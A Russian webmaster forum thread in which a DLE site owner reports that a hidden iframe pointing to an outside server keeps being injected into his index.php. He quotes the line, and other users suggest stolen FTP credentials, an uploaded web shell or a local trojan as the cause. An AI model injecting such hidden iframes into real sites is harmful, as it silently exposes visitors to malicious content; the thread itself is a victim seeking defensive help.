В Index.php постоянно повляется непонятный iframe

12 3
_Unikum_
На сайте с 28.06.2008
Offline
117
2749

Не знал куда поместить тему, поэтому написал тут.

Последнюю неделю с некоторой периодичностью в index.php (движок DLE) появляется неизвестно откуда вот такой код в самом низу:

<iframe src="http://xt7.ru:8080/index.php" width=153 height=118 style="visibility: hidden"></iframe>

Естественно сайт перестает работать появляется ошибка, я заменяю index.php и все становится нормально. Что это за столь интересное явление, может вирус? Но это появляется на 2-ух разных сайтах, которые на разных хостингах... Конкуренты?

С Уважением, Сергей.
M5
На сайте с 03.05.2009
Offline
41
md5
#1

Вирусы это, вирусы, а не конкуренты.

На форуме уже полно тем с такими вопросами.

Меняйте пароль от фтп, удаляйте пароле, если они хранятся в каком-нибудь менеджере (напр. тотале) и будет счастье.

iren K
На сайте с 28.12.2008
Offline
222
#2

поставьте cmod 444 на файл

посмотрите также что сидит в папке cgi-bin - если Ваших скриптов там нет, тоже ставьте 444 на директорию

c уважением Iren
_Unikum_
На сайте с 28.06.2008
Offline
117
#3

cmod 444 ставил, все равно не помогло. Попробую сделать так как посоветовал md5. Есть еще предложение, как от этого избавиться?

iren K
На сайте с 28.12.2008
Offline
222
#4
_Unikum_:
cmod 444 ставил, все равно не помогло. Попробую сделать так как посоветовал md5. Есть еще предложение, как от этого избавиться?

не может быть - возможно фрейм прописался до смены - Вы просто пропустили?

смените ftp клиента, для начала

_Unikum_
На сайте с 28.06.2008
Offline
117
#5
iren K:
не может быть - возможно фрейм прописался до смены - Вы просто пропустили?

смените ftp клиента, для начала

Сейчас заметил, оказывается ставишь чмод 444, он ставиться. Потом проверяешь чмод опять 644...

В качестве фтп клиента использую обычный тотал коммандер, уже целый год и все нормально было.

Delarante
На сайте с 13.07.2008
Offline
69
#6

Я думаю, к вам на хостинг залили, шел. Через него и прописывают эту бяку… Поищите сами, в принципе его найти можно если захотеть… Ищите файл которого нет в наборе dle...

iren K
На сайте с 28.12.2008
Offline
222
#7
_Unikum_:
Сейчас заметил, оказывается ставишь чмод 444, он ставиться. Потом проверяешь чмод опять 644...

да, многие хостеры не дают ставить cmod444

попробуйте cutftpPro в качестве клиента (версии после 8.3)

_Unikum_
На сайте с 28.06.2008
Offline
117
#8
iren K:
поставьте cmod 444 на файл
посмотрите также что сидит в папке cgi-bin - если Ваших скриптов там нет, тоже ставьте 444 на директорию

Посмотрел эту директорию, там ничего на одном сайте. А у второго сайта вообще этой директории нет.

Delarante:
Я думаю, к вам на хостинг залили, шел. Через него и прописывают эту бяку… Поищите сами, в принципе его найти можно если захотеть… Ищите файл которого нет в наборе dle...

Вроде просмотрел, неизвестных чужих файлов нет. Прописывается это только в одном файле, в нем наверно и проблема. Хотя если бы это был вирус на хостинге, то почему он выбирает именно этот один сайт из 5, которые тоже на дле. А iframe появляется на сайтах, которые в топе по одному ВЧ запросу, эти сайты на разных хостингах, но код itrame одинаковый почти появляется с периодичностью.

[Удален]
#9

Если тупо перепрописывается один и тот же код и только в индексные файлы - ищите трояна в собственной машине.

Delarante
На сайте с 13.07.2008
Offline
69
#10
_Unikum_:

Вроде просмотрел, неизвестных чужих файлов нет. Прописывается это только в одном файле, в нем наверно и проблема. Хотя если бы это был вирус на хостинге, то почему он выбирает именно этот один сайт из 5, которые тоже на дле. А iframe появляется на сайтах, которые в топе по одному ВЧ запросу, эти сайты на разных хостингах, но код itrame одинаковый почти появляется с периодичностью.

Он может быть в папке шаблона, каких либо плагинов, и тому подобному. Подумайте что есть общего у этих сайтов в Топе и нет у тех которые не заражены... Общий шаблон, сборка дле с одного ресурса, если не лицензия конечно, и т.д.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий